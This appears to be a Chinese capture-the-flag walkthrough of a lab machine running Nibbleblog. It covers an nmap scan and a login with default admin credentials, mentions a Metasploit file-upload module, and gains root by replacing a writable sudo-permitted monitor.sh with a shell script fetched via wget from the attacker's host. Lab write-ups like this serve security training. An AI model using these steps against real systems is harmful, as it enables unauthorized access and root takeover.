基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV 10.10.10.75
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-06 15:14 CST
Nmap scan report for 10.10.10.75
Host is up (0.35s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 811.86 seconds

80

80就一个helloworld,注释里面有目录:

是个Nibbleblog:

Nibbleblog

直接默认登录:

1
2
http://10.10.10.75/nibbleblog/admin.php
admin/nibbles

exploit

直接搜到个任意文件上传,msf有模块一键打:

user flag

直接用户目录得到user.txt:

提权信息

Sudo -l 发现monitor.sh:

1
python3 -c 'import pty; pty.spawn("/bin/bash")'

Personal.zip自己解压后就有相关文件:

1
unzip personal.zip

monitor.sh我们有可写权限,那就直接修改内容即可

monitor.sh

1
2
#!/bin/sh
bash

提权 && root flag

直接修改内容,运行,得到root shell:

1
2
3
wget http://10.10.14.10:7777/monitor.sh
chmod +x monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh

参考资料